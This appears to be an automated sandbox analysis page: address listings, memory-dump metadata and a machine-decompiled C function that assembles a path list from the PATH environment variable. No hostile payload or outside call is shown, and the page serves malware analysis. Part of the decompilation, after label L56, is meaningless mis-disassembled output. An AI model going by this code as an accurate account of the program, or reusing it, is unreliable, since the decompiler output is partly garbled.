                                                          0x00000000
                                                          0x0349487d
                                                          0x0349487d
                                                          0x03494882
                                                          0x03494889
                                                          0x03494889
                                                          0x0349488f
                                                          0x03494891
                                                          0x034948e0
                                                          0x034948e2
                                                          0x034948e4
                                                          0x034948e4
                                                          0x034948e7
                                                          0x034948e7
                                                          0x034948ed
                                                          0x034948f4
                                                          0x034948f6
                                                          0x03494951
                                                          0x03494951
                                                          0x03494953
                                                          0x03494953
                                                          0x03494956
                                                          0x03494956
                                                          0x03494958
                                                          0x03494959
                                                          0x03494959
                                                          0x0349495d
                                                          0x0349495d
                                                          0x0349495f
                                                          0x0349495f
                                                          0x03494965
                                                          0x03494969
                                                          0x034949ba
                                                          0x034949ba
                                                          0x034949c1
                                                          0x034949c5
                                                          0x034949cc
                                                          0x034949d4
                                                          0x034949d7
                                                          0x034949da
                                                          0x034949e4
                                                          0x034949e5
                                                          0x034949f3
                                                          0x03494a02
                                                          0x00000000
                                                          0x03494a02
                                                          0x03494972
                                                          0x03494974
                                                          0x00000000
                                                          0x00000000
                                                          0x03494976
                                                          0x03494979
                                                          0x03494982
                                                          0x03494983
                                                          0x03494984
                                                          0x0349498b
                                                          0x0349498d
                                                          0x03494991
                                                          0x03494993
                                                          0x03494999
                                                          0x0349499d
                                                          0x034949a2
                                                          0x034949a2
                                                          0x034949a2
                                                          0x03494999
                                                          0x034949ac
                                                          0x00000000
                                                          0x034949b3
                                                          0x034948f8
                                                          0x034948fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034948fe
                                                          0x03494895
                                                          0x0349489c
                                                          0x034948ad
                                                          0x034948b2
                                                          0x034948b5
                                                          0x034948b7
                                                          0x034948ba
                                                          0x034948bc
                                                          0x034948c6
                                                          0x034948c6
                                                          0x034948cb
                                                          0x034948d1
                                                          0x034948d4
                                                          0x034948d8
                                                          0x034948d8
                                                          0x00000000
                                                          0x034948d8
                                                          0x034948be
                                                          0x034948c0
                                                          0x00000000
                                                          0x00000000
                                                          0x034948c2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034948c4
                                                          0x00000000
                                                          0x03494882
                                                          0x0349487b
                                                          0x03494904
                                                          0x03494906
                                                          0x00000000
                                                          0x00000000
                                                          0x03494908
                                                          0x0349490e
                                                          0x00000000
                                                          0x00000000
                                                          0x03494910
                                                          0x03494917
                                                          0x03494917
                                                          0x00000000
                                                          0x03494917
                                                          0x0343b1ba
                                                          0x034947f9
                                                          0x034947fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x034947fc
                                                          0x0343b1c0
                                                          0x0343b1c0
                                                          0x0343b1c3
                                                          0x0343b1cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: _vswprintf_s
                                                          • String ID:
                                                          • API String ID: 677850445-0
                                                          • Opcode ID: 6332be55c19eb6db9f72b8b47479d64c50234a659878ee282d69d31fed84d2fd
                                                          • Instruction ID: 77ea931d8cadc123c821d267cbba4c4454d3f51b08df12c361d45ffb0a89144e
                                                          • Opcode Fuzzy Hash: 6332be55c19eb6db9f72b8b47479d64c50234a659878ee282d69d31fed84d2fd
                                                          • Instruction Fuzzy Hash: 7351AB79D042598EEF20CF66C844BAEBFB4AF05714F1441EFD869AF381D77049468B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03462581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E03462581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200898, char _a1546912578) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				char* _t244;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				intOrPtr _t278;
				signed int _t280;
				signed int _t282;
				void* _t286;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				signed int _t297;
				signed int _t301;
				intOrPtr _t318;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				void* _t337;
				void* _t340;
				void* _t341;
				void* _t343;
				void* _t344;
				void* _t346;
				signed int _t347;
				signed int _t349;
				signed int _t353;
				void* _t354;
				void* _t357;

				_t349 = _t353;
				_t354 = _t353 - 0x4c;
				_v8 =  *0x352d360 ^ _t349;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t334 = 0x352b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t327 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t335 = 0xc0000106;
						goto L32;
					} else {
						_t334 = L03454620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t334;
						__eflags = _t334;
						if(_t334 == 0) {
							_t335 = 0xc0000017;
							goto L32;
						} else {
							 *(_t334 + 0x44) =  *(_t334 + 0x44) & 0x00000000;
							_t50 = _t334 + 0x48; // 0x48
							_t329 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t334 + 0x3c)) = _t278;
							_t280 = 0;
							 *((short*)(_t334 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t334 + 0x18) = _t329;
								__eflags = _t311 - 0x3528478;
								 *_t334 = ((0 | _t311 == 0x03528478) - 0x00000001 & 0xfffffffb) + 7;
								E0347F3E0(_t329,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t354 = _t354 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t329 = _t329 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E034C39F2(_t329);
									_t311 = _v32;
									_t329 = _t272;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t335 = _v68;
								__eflags = 0;
								 *((short*)(_t329 - 2)) = 0;
								goto L32;
							} else {
								_t282 = _t334 + _t280 * 4;
								_v56 = _t282;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t237 =  *(_v60 + _t294 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t282 =  *(_v60 + _t294 * 4);
										 *(_t282 + 0x18) = _t329;
										_t241 =  *(_v60 + _t294 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M03462959))) {
												case 0:
													__ax =  *0x3528488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0347F3E0(__edi,  *0x352848c, __ax & 0x0000ffff);
														__eax =  *0x3528488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0347F3E0(_t329, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x3528480 & 0x0000ffff = E0347F3E0(__edi,  *0x3528484,  *0x3528480 & 0x0000ffff);
													__eax =  *0x3528480 & 0x0000ffff;
													__eax = ( *0x3528480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0347F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0347F3E0(_t329, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t354 = _t354 + 0xc;
													_t329 = _t329 + (_t267 >> 1) * 2 + 2;
													__eflags = _t329;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t329 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x352575c;
													__eflags = __ebx - 0x352575c;
													if(__ebx != 0x352575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0347F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x352575c;
														} while (__ebx != 0x352575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x3528478 & 0x0000ffff = E0347F3E0(__edi,  *0x352847c,  *0x3528478 & 0x0000ffff);
													__eax =  *0x3528478 & 0x0000ffff;
													__eax = ( *0x3528478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E034C39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x3526e58 & 0x0000ffff = E0347F3E0(__edi,  *0x3526e5c,  *0x3526e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x3526e58 & 0x0000ffff;
													__eax = ( *0x3526e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t311 = _v32;
													L29:
													_t282 = _t282 + 4;
													__eflags = _t282;
													_v56 = _t282;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t327 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M03462935))) {
							case 0:
								__ax =  *0x3528488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E03462E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x3528480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3528480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0344EEF0(0x35279a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0344EB70(__ecx, 0x35279a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t335;
												if(_t335 < 0) {
													L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x3527b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03454620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0344EB70(__ecx, 0x35279a0);
										__eax = _v52;
										L36:
										_pop(_t328);
										_pop(_t336);
										__eflags = _v8 ^ _t349;
										_pop(_t279);
										return E0347B640(_t216, _t279, _v8 ^ _t349, _t311, _t328, _t336);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t276 = E03462E3E(_t274,  &_v36);
									_t290 = _v36;
									_v76 = _t276;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x3525764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x3528478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x3528478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x3526e58 & 0x0000ffff;
								__eax = ( *0x3526e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t327 = _t327 + 1;
								if(_t327 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					_t337 = _t334 + 1;
					_t357 = _t354 +  *((intOrPtr*)(_t337 + 0x28)) + _t241;
					asm("daa");
					_t340 = _t337 + 3;
					_t341 = _t340 + 1;
					_t244 = _t241 +  *((intOrPtr*)(_t340 + 0x28)) +  *0x1f034626 +  *((intOrPtr*)(_t311 - 1 +  *((intOrPtr*)(_t241 +  *((intOrPtr*)(_t340 + 0x28)) +  *0x1f034626 +  &_a1530200898)) - 1));
					 *((intOrPtr*)(_t341 + 3)) =  *((intOrPtr*)(_t341 + 3)) - _t244;
					 *_t244 =  *_t244 - 0x46;
					asm("daa");
					_t343 = _t341 + _t341 + 1;
					 *((intOrPtr*)(_t343 + 3)) =  *((intOrPtr*)(_t343 + 3)) - _t244;
					_t344 = _t343 - 1;
					 *((intOrPtr*)(_t344 + 3)) =  *((intOrPtr*)(_t344 + 3)) - _t244;
					asm("daa");
					_t286 = 0x25;
					_t346 = _t344 + 1 +  *((intOrPtr*)(_t244 +  &_a1546912578));
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x350ff00);
					E0348D08C(_t286, _t329, _t346);
					_v44 =  *[fs:0x18];
					_t330 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t347 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t301 = _t249 * 0xc;
							_v48 = _t301;
							__eflags = _t287 -  *((intOrPtr*)(_t301 + 0x3411664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0347E5C0(_a8,  *((intOrPtr*)(_t301 + 0x3411668)), _t287);
									_t357 = _t357 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t347 = E034B51BE(_t287,  *((intOrPtr*)(_v48 + 0x341166c)), _a16, _t330, _t347, __eflags, _a20, _a24);
										_v52 = _t347;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t347;
						__eflags = _t347;
						if(_t347 < 0) {
							__eflags = _t347 - 0xc0000100;
							if(_t347 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t330;
									if( *_t297 == _t330) {
										_t347 = 0xc0000100;
										goto L76;
									} else {
										_t318 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t318 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t297) {
											__eflags =  *(_t318 + 0x1c);
											if( *(_t318 + 0x1c) == 0) {
												L106:
												_t347 = E03462AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t347;
												__eflags = _t347 - 0xc0000100;
												if(_t347 != 0xc0000100) {
													goto L69;
												} else {
													_t330 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t254 = E03446600( *(_t318 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t347 = E03462C50(_t297, _a8, _t287, _a16, _a20, _a24, _t330);
											L76:
											_v32 = _t347;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0344EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t347 = _a24;
									_t261 = E03462AE4( &_v36, _a8, _t287, _a16, _a20, _t347);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E03462C50(_v36, _a8, _t287, _a16, _a20, _t347, 1);
									}
									_v8 = _t330;
									E03462ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t347;
					}
					L70:
					return E0348D0D1(_t247);
				}
				L108:
			}

























































                                                          0x03462584
                                                          0x03462586
                                                          0x03462590
                                                          0x03462596
                                                          0x03462597
                                                          0x03462598
                                                          0x03462599
                                                          0x0346259e
                                                          0x034625a4
                                                          0x034625a9
                                                          0x034625ac
                                                          0x034625ae
                                                          0x034625b1
                                                          0x034625b2
                                                          0x034625b5
                                                          0x034625b8
                                                          0x034625bb
                                                          0x034625bc
                                                          0x034625bf
                                                          0x034625c2
                                                          0x034625c5
                                                          0x034625c6
                                                          0x034625cb
                                                          0x034625ce
                                                          0x034625d8
                                                          0x034625dd
                                                          0x034625de
                                                          0x034625e1
                                                          0x034625e3
                                                          0x034625e9
                                                          0x034626da
                                                          0x034626da
                                                          0x034626dd
                                                          0x034626e2
                                                          0x034a5b56
                                                          0x00000000
                                                          0x034626e8
                                                          0x034626f9
                                                          0x034626fb
                                                          0x034626fe
                                                          0x03462700
                                                          0x034a5b60
                                                          0x00000000
                                                          0x03462706
                                                          0x03462706
                                                          0x0346270a
                                                          0x0346270a
                                                          0x0346270d
                                                          0x03462713
                                                          0x03462716
                                                          0x03462718
                                                          0x0346271c
                                                          0x0346271e
                                                          0x034a5b6c
                                                          0x034a5b6f
                                                          0x034a5b7f
                                                          0x034a5b89
                                                          0x034a5b8e
                                                          0x034a5b93
                                                          0x034a5b96
                                                          0x034a5b9c
                                                          0x034a5ba0
                                                          0x034a5ba3
                                                          0x034a5bab
                                                          0x034a5bb0
                                                          0x034a5bb3
                                                          0x034a5bb3
                                                          0x034a5ba3
                                                          0x03462724
                                                          0x03462726
                                                          0x03462729
                                                          0x0346272c
                                                          0x0346279d
                                                          0x0346279d
                                                          0x034627a0
                                                          0x034627a2
                                                          0x00000000
                                                          0x0346272e
                                                          0x0346272e
                                                          0x03462731
                                                          0x03462734
                                                          0x03462734
                                                          0x03462736
                                                          0x034a5bc1
                                                          0x034a5bc1
                                                          0x034a5bc4
                                                          0x00000000
                                                          0x034a5bca
                                                          0x034a5bca
                                                          0x034a5bcd
                                                          0x00000000
                                                          0x034a5bd3
                                                          0x00000000
                                                          0x034a5bd3
                                                          0x034a5bcd
                                                          0x0346273c
                                                          0x0346273c
                                                          0x03462742
                                                          0x03462747
                                                          0x0346274a
                                                          0x0346274d
                                                          0x03462750
                                                          0x00000000
                                                          0x03462756
                                                          0x03462756
                                                          0x00000000
                                                          0x03462902
                                                          0x03462908
                                                          0x0346290b
                                                          0x00000000
                                                          0x03462911
                                                          0x0346291c
                                                          0x03462921
                                                          0x00000000
                                                          0x03462921
                                                          0x00000000
                                                          0x00000000
                                                          0x03462880
                                                          0x03462887
                                                          0x0346288c
                                                          0x00000000
                                                          0x00000000
                                                          0x03462805
                                                          0x0346280a
                                                          0x03462814
                                                          0x03462816
                                                          0x00000000
                                                          0x00000000
                                                          0x0346281e
                                                          0x03462821
                                                          0x03462823
                                                          0x00000000
                                                          0x03462829
                                                          0x03462829
                                                          0x03462831
                                                          0x0346283c
                                                          0x0346283e
                                                          0x00000000
                                                          0x0346283e
                                                          0x00000000
                                                          0x00000000
                                                          0x0346284e
                                                          0x03462850
                                                          0x03462851
                                                          0x03462854
                                                          0x03462857
                                                          0x0346285a
                                                          0x0346285c
                                                          0x0346285d
                                                          0x00000000
                                                          0x00000000
                                                          0x0346275d
                                                          0x03462761
                                                          0x00000000
                                                          0x03462767
                                                          0x0346276e
                                                          0x03462773
                                                          0x03462773
                                                          0x03462776
                                                          0x03462778
                                                          0x0346277e
                                                          0x0346277e
                                                          0x03462781
                                                          0x03462781
                                                          0x03462783
                                                          0x03462784
                                                          0x00000000
                                                          0x00000000
                                                          0x034a5bd8
                                                          0x034a5bde
                                                          0x034a5be4
                                                          0x034a5be6
                                                          0x034a5be8
                                                          0x034a5be9
                                                          0x034a5bee
                                                          0x034a5bf8
                                                          0x034a5bff
                                                          0x034a5c01
                                                          0x034a5c04
                                                          0x034a5c07
                                                          0x034a5c0b
                                                          0x034a5c0d
                                                          0x034a5c0d
                                                          0x034a5c15
                                                          0x034a5c18
                                                          0x034a5c1b
                                                          0x034a5c1b
                                                          0x034a5c1e
                                                          0x00000000
                                                          0x00000000
                                                          0x034628c3
                                                          0x034628c8
                                                          0x034628d2
                                                          0x034628d4
                                                          0x034628d8
                                                          0x034628db
                                                          0x034a5c26
                                                          0x034a5c28
                                                          0x034a5c2d
                                                          0x034a5c2d
                                                          0x00000000
                                                          0x00000000
                                                          0x034a5c34
                                                          0x034a5c36
                                                          0x034a5c49
                                                          0x034a5c4e
                                                          0x034a5c54
                                                          0x034a5c5b
                                                          0x034a5c5d
                                                          0x034a5c60
                                                          0x03462788
                                                          0x03462788
                                                          0x0346278b
                                                          0x0346278e
                                                          0x0346278e
                                                          0x0346278e
                                                          0x03462791
                                                          0x00000000
                                                          0x00000000
                                                          0x03462756
                                                          0x03462750
                                                          0x00000000
                                                          0x03462794
                                                          0x03462794
                                                          0x03462795
                                                          0x03462798
                                                          0x03462798
                                                          0x00000000
                                                          0x03462734
                                                          0x0346272c
                                                          0x03462700
                                                          0x034625ef
                                                          0x034625ef
                                                          0x034625ef
                                                          0x034625f2
                                                          0x034625f8
                                                          0x00000000
                                                          0x00000000
                                                          0x034625fe
                                                          0x00000000
                                                          0x034628e6
                                                          0x034628ec
                                                          0x034628ef
                                                          0x034628f5
                                                          0x034628f8
                                                          0x034628f8
                                                          0x00000000
                                                          0x034628f8
                                                          0x00000000
                                                          0x00000000
                                                          0x03462866
                                                          0x03462866
                                                          0x03462876
                                                          0x03462879
                                                          0x00000000
                                                          0x00000000
                                                          0x034627e0
                                                          0x034627e7
                                                          0x034627e9
                                                          0x034627eb
                                                          0x034a5afd
                                                          0x00000000
                                                          0x034a5afd
                                                          0x00000000
                                                          0x00000000
                                                          0x03462633
                                                          0x03462638
                                                          0x0346263b
                                                          0x0346263c
                                                          0x0346263e
                                                          0x03462640
                                                          0x03462642
                                                          0x03462647
                                                          0x03462649
                                                          0x0346264e
                                                          0x03462650
                                                          0x03462653
                                                          0x03462659
                                                          0x034626a2
                                                          0x034626a7
                                                          0x034626ac
                                                          0x034626b2
                                                          0x034a5b11
                                                          0x034a5b15
                                                          0x034a5b17
                                                          0x00000000
                                                          0x034626b8
                                                          0x034626b8
                                                          0x034626ba
                                                          0x034627a6
                                                          0x034627a6
                                                          0x034627a9
                                                          0x034627ab
                                                          0x034627b9
                                                          0x034627b9
                                                          0x034627be
                                                          0x034627c1
                                                          0x034627c3
                                                          0x034627c5
                                                          0x034627c7
                                                          0x034a5c74
                                                          0x034a5c79
                                                          0x034a5c79
                                                          0x034627c7
                                                          0x00000000
                                                          0x034626c0
                                                          0x034626c0
                                                          0x034626c3
                                                          0x034626c6
                                                          0x034626c6
                                                          0x034626c9
                                                          0x034626c9
                                                          0x00000000
                                                          0x034626c9
                                                          0x034626ba
                                                          0x0346265b
                                                          0x0346265b
                                                          0x0346265e
                                                          0x03462667
                                                          0x0346266d
                                                          0x03462677
                                                          0x0346267c
                                                          0x0346267f
                                                          0x03462681
                                                          0x034a5b49
                                                          0x034a5b4e
                                                          0x034627cd
                                                          0x034627d0
                                                          0x034627d1
                                                          0x034627d2
                                                          0x034627d4
                                                          0x034627dd
                                                          0x03462687
                                                          0x03462687
                                                          0x0346268a
                                                          0x0346268b
                                                          0x0346268e
                                                          0x0346268f
                                                          0x03462691
                                                          0x03462696
                                                          0x03462698
                                                          0x0346269d
                                                          0x0346269f
                                                          0x00000000
                                                          0x0346269f
                                                          0x03462681
                                                          0x00000000
                                                          0x00000000
                                                          0x03462846
                                                          0x00000000
                                                          0x00000000
                                                          0x03462605
                                                          0x0346260a
                                                          0x0346260c
                                                          0x03462611
                                                          0x03462616
                                                          0x03462619
                                                          0x03462619
                                                          0x0346261e
                                                          0x00000000
                                                          0x03462624
                                                          0x03462627
                                                          0x03462627
                                                          0x00000000
                                                          0x00000000
                                                          0x034a5b1f
                                                          0x00000000
                                                          0x00000000
                                                          0x03462894
                                                          0x0346289b
                                                          0x0346289d
                                                          0x034628a1
                                                          0x034a5b2b
                                                          0x034a5b2e
                                                          0x034a5b2e
                                                          0x034628a7
                                                          0x034628a9
                                                          0x034a5b04
                                                          0x034a5b09
                                                          0x034a5b09
                                                          0x034a5b09
                                                          0x00000000
                                                          0x00000000
                                                          0x034a5b35
                                                          0x034a5b3c
                                                          0x034628fb
                                                          0x034628fb
                                                          0x034626cc
                                                          0x034626cc
                                                          0x034626d0
                                                          0x00000000
                                                          0x034626d2
                                                          0x034626d2
                                                          0x00000000
                                                          0x034626d2
                                                          0x00000000
                                                          0x00000000
                                                          0x034625fe
                                                          0x0346292d
                                                          0x03462930
                                                          0x03462935
                                                          0x03462937
                                                          0x0346293c
                                                          0x0346293e
                                                          0x03462942
                                                          0x03462947
                                                          0x03462958
                                                          0x0346295a
                                                          0x0346295d
                                                          0x03462962
                                                          0x03462963
                                                          0x03462966
                                                          0x03462969
                                                          0x0346296a
                                                          0x0346296e
                                                          0x03462972
                                                          0x03462974
                                                          0x0346297e
                                                          0x0346297f
                                                          0x03462980
                                                          0x03462981
                                                          0x03462982
                                                          0x03462983
                                                          0x03462984
                                                          0x03462985
                                                          0x03462986
                                                          0x03462987
                                                          0x03462988
                                                          0x03462989
                                                          0x0346298a
                                                          0x0346298b
                                                          0x0346298c
                                                          0x0346298d
                                                          0x0346298e
                                                          0x0346298f
                                                          0x03462990
                                                          0x03462992
                                                          0x03462997
                                                          0x034629a3
                                                          0x034629a6
                                                          0x034629ab
                                                          0x034629ad
                                                          0x034629b0
                                                          0x034629b2
                                                          0x034a5c80
                                                          0x034629b8
                                                          0x034629b8
                                                          0x034629bb
                                                          0x034629c0
                                                          0x034629c5
                                                          0x034629c6
                                                          0x034629c6
                                                          0x034629c9
                                                          0x034629cb
                                                          0x00000000
                                                          0x00000000
                                                          0x034629cd
                                                          0x034629d0
                                                          0x034629d9
                                                          0x034629db
                                                          0x034629dd
                                                          0x03462a7f
                                                          0x03462a84
                                                          0x03462a87
                                                          0x03462a89
                                                          0x034a5ca1
                                                          0x034a5ca3
                                                          0x00000000
                                                          0x03462a8f
                                                          0x03462a8f
